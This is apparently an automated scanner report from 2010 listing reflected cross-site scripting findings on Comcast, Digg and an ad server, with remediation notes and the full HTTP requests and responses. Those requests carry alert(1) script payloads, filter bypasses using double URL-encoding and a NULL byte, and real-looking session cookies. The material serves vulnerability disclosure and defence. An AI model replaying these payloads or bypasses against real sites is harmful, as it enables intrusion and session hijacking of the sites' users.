HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357774e0";alert(1)//c797c1e1737/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ecbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c82208ba9a was submitted in the REST URL parameter 2. This input was echoed as 4ecbc"><script>alert(1)</script>8c82208ba9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574ecbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c82208ba9a/561.0.iframe.120x30/1292781871793740 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313574ecbc"><script>alert(1)</script>8c82208ba9a/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dff08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec72cac2bc34 was submitted in the REST URL parameter 3. This input was echoed as dff08"><script>alert(1)</script>c72cac2bc34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30dff08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec72cac2bc34/1292781871793740 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30dff08"><script>alert(1)</script>c72cac2bc34/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcfe0%2522%253balert%25281%2529%252f%252f522001d1e27 was submitted in the REST URL parameter 3. This input was echoed as fcfe0";alert(1)//522001d1e27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30fcfe0%2522%253balert%25281%2529%252f%252f522001d1e27/1292781871793740 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 19 Dec 2010 18:06:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30fcfe0";alert(1)//522001d1e27/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
2.17. http://customer.comcast.com/Pages/FAQViewer.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://customer.comcast.com
Path:
/Pages/FAQViewer.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48cbb'-alert(1)-'e073ca99f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/FAQViewer.aspx?48cbb'-alert(1)-'e073ca99f6=1 HTTP/1.1 Host: customer.comcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UCID=a989d7e1-b26f-48ab-857b-c7e753595bba; SC=RC.USID=063fb053-dc8f-4e5d-9d03-5b6c874be482; fsr.s={"cp":{"CustomerID":"bcc4a621-b4c2-40c1-8722-c28eff11af5e"},"v":1,"pv":3,"lc":{"d0":{"v":3,"s":true}},"sd":0}; s_sess=%20ev41%3D%2526%2523039%253B%3B%20stc18%3D%2526%2523039%253B%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; __utmz=24577576.1292781826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ServerID=1035; fsr.a=1292781826322; mbox=PC#1292775334802-298696.20#1293991427|session#1292780810234-197287#1292783687|check#true#1292781887; s_pers=%20s_cpm%3D%255B%255B%2527Keyword%2527%252C%25271292775340969%2527%255D%252C%255B%2527Referrers%2527%252C%25271292775817472%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292775826355%2527%255D%252C%255B%2527Referrers%2527%252C%25271292780811571%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292781768566%2527%255D%255D%7C1450548168565%3B%20s_v5%3D%255B%255B%2527%252526%252523039%25253B%2527%252C%25271292781796322%2527%255D%255D%7C1450548196322%3B%20dfa_cookie%3Dcomcastdotcomprod%7C1292783625663%3B%20gpv_07%3Dcustomercentral%253Ahelp%253Ahelp%2520index%253A%2520help%2520main%7C1292783625725%3B; bn_u=6923335571706691164; __utma=24577576.1986915861.1292781826.1292781826.1292781826.1; __utmc=24577576; __utmb=24577576.1.10.1292781826; ASP.NET_SessionId=l2vema45zv4phtzqkshvqf55;
Response
HTTP/1.1 200 OK Set-Cookie: SLBCCC=R625934426; path=/ Connection: close Date: Sun, 19 Dec 2010 18:08:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 31588
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.18. http://customer.comcast.com/Pages/Help.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://customer.comcast.com
Path:
/Pages/Help.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfda2'-alert(1)-'14bdd683d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/Help.aspx?cfda2'-alert(1)-'14bdd683d0a=1 HTTP/1.1 Host: customer.comcast.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ServerID=1035; SC=RC.USID=063fb053-dc8f-4e5d-9d03-5b6c874be482; UCID=a989d7e1-b26f-48ab-857b-c7e753595bba; bn_u=6923335571706691164; mbox=PC#1292775334802-298696.20#1293991405|session#1292780810234-197287#1292783665|check#true#1292781865; s_pers=%20s_cpm%3D%255B%255B%2527Keyword%2527%252C%25271292775340969%2527%255D%252C%255B%2527Referrers%2527%252C%25271292775817472%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292775826355%2527%255D%252C%255B%2527Referrers%2527%252C%25271292780811571%2527%255D%252C%255B%2527Direct%252520Load%2527%252C%25271292781768566%2527%255D%255D%7C1450548168565%3B%20s_v5%3D%255B%255B%2527%252526%252523039%25253B%2527%252C%25271292781796322%2527%255D%255D%7C1450548196322%3B%20dfa_cookie%3Dcomcastdotcomprod%7C1292783608847%3B%20gpv_07%3Dcomcast%2520-%2520home%7C1292783608973%3B; s_sess=%20ev41%3D%2526%2523039%253B%3B%20stc18%3D%2526%2523039%253B%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; fsr.s={"cp":{"CustomerID":"bcc4a621-b4c2-40c1-8722-c28eff11af5e"},"v":1,"pv":2,"lc":{"d0":{"v":2,"s":true}},"sd":0}; fsr.a=1292781820476
Response
HTTP/1.0 200 OK Connection: close Date: Sun, 19 Dec 2010 18:06:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=r11dc3yqy5eqr145p1pu2q55; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 72338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f91c"><script>alert(1)</script>a60ae5d7848 was submitted in the REST URL parameter 1. This input was echoed as 9f91c"><script>alert(1)</script>a60ae5d7848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%009f91c"><script>alert(1)</script>a60ae5d7848 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74265<script>alert(1)</script>30d63b2ac0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com74265<script>alert(1)</script>30d63b2ac0f/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:22 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLCcLxLrNlVmBMqgN2n2hJsQDKd2qK8vl9VgYB8h7wmSgGSMVjP!715189861!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com74265<script>alert(1)</script>30d63b2ac0f/comcast/online/dvp/presentation/pageflows/Help/getFAQ</td> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f1d1<script>alert(1)</script>eea8c678143 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast9f1d1<script>alert(1)</script>eea8c678143/online/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:22 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLCL7vPL4Y0Q2pTLnvGmxRjg11vxtdMvr1JvTp0HmyHNbn5FQ6q!935594247!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast9f1d1<script>alert(1)</script>eea8c678143/online/dvp/presentation/pageflows/Help/getFAQ</td> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6eaeb<script>alert(1)</script>d4a64e7fde7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online6eaeb<script>alert(1)</script>d4a64e7fde7/dvp/presentation/pageflows/Help/getFAQ.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:23 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLDXpQPVwR0NSFbDWJ48rhgPGqGFcZCPXzCVpRzn7DWwy19jLq5!-1576092857!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online6eaeb<script>alert(1)</script>d4a64e7fde7/dvp/presentation/pageflows/Help/getFAQ</td> ...[SNIP]...
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d3d0f<script>alert(1)</script>807ced074d1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvpd3d0f<script>alert(1)</script>807ced074d1/presentation/pageflows/Help/getFAQ.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:24 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLGtRfdWXBmhXRScpp4v9MJpBSnJt2lgG2ry2Pcj77vLRrJhJZp!1431461321!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvpd3d0f<script>alert(1)</script>807ced074d1/presentation/pageflows/Help/getFAQ</td> ...[SNIP]...
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 77b14<script>alert(1)</script>9cd91501f2a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation77b14<script>alert(1)</script>9cd91501f2a/pageflows/Help/getFAQ.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:24 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLGpRLHMMNQnH4fkKVJRZPpr4818zS3V3RwkRkQ1X1rCyfHxGh0!198205627!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp/presentation77b14<script>alert(1)</script>9cd91501f2a/pageflows/Help/getFAQ</td> ...[SNIP]...
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 7b6f5<script>alert(1)</script>4d76aec21db was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows7b6f5<script>alert(1)</script>4d76aec21db/Help/getFAQ.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:25 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLFJlJV2hcp0DJXC712TSBplDsQLn2NL246M6XtmYTgJTxj0T1C!377427874!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp/presentation/pageflows7b6f5<script>alert(1)</script>4d76aec21db/Help/getFAQ</td> ...[SNIP]...
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 62a76<script>alert(1)</script>a79a11159c2 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help62a76<script>alert(1)</script>a79a11159c2/getFAQ.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:26 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLG0hxvHk7cTJp1GQTnh4lbJxLx1yM1vxnGwfJsXnLG7TPBDQWY!715189861!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp/presentation/pageflows/Help62a76<script>alert(1)</script>a79a11159c2/getFAQ</td> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload deaea<script>alert(1)</script>082bf320537 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/comdeaea<script>alert(1)</script>082bf320537/comcast/online/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:20 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLQqxQ6GV11Wbvp5zS1tmnwpCMblny22XTm5hTLj62pTzBBLTzp!1325758820!-794401224; path=/ Cache-Control: no-cache Connection: close Content-Length: 716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>comdeaea<script>alert(1)</script>082bf320537/comcast/online/dvp/presentation/pageflows/Login/authForward</td> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3c14<script>alert(1)</script>a205b4c0e20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcastc3c14<script>alert(1)</script>a205b4c0e20/online/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:20 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLQVZrBhsxLHvRGZ7hjLppY1FSHbwjwnghLQvQr7Hkmvlv2psph!-1185923515!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcastc3c14<script>alert(1)</script>a205b4c0e20/online/dvp/presentation/pageflows/Login/authForward</td> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7d6c8<script>alert(1)</script>59ccf0b3972 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online7d6c8<script>alert(1)</script>59ccf0b3972/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:21 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLBZywMQ5KZD1CY2LT4c83KM57j22ZpLv086n72VFqgPX1MfzVl!-1576092857!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online7d6c8<script>alert(1)</script>59ccf0b3972/dvp/presentation/pageflows/Login/authForward</td> ...[SNIP]...
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 22a41<script>alert(1)</script>3524ac4ba0f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp22a41<script>alert(1)</script>3524ac4ba0f/presentation/pageflows/Login/authForward.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:13:22 GMT Server: Sun-ONE-Web-Server/6.1 Content-type: text/html;charset=utf-8 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=NTLChgQ8y1G1dPYKTygvH2hCR8L8TCS2Z19K9hGN65LJT4QPlKFs!377427874!NONE; path=/ Cache-Control: no-cache Connection: close Content-Length: 716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title>Page Flow Error - Action Not Found</title></head><body><h1> ...[SNIP]... <td>com/comcast/online/dvp22a41<script>alert(1)</script>3524ac4ba0f/presentation/pageflows/Login/authForward</td> ...[SNIP]...
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 593da<script>alert(1)</script>3df36c0971c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation593da<script>alert(1)</script>3df36c0971c/pageflows/Login/authForward.do HTTP/1.1 Host: digitalvoice.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
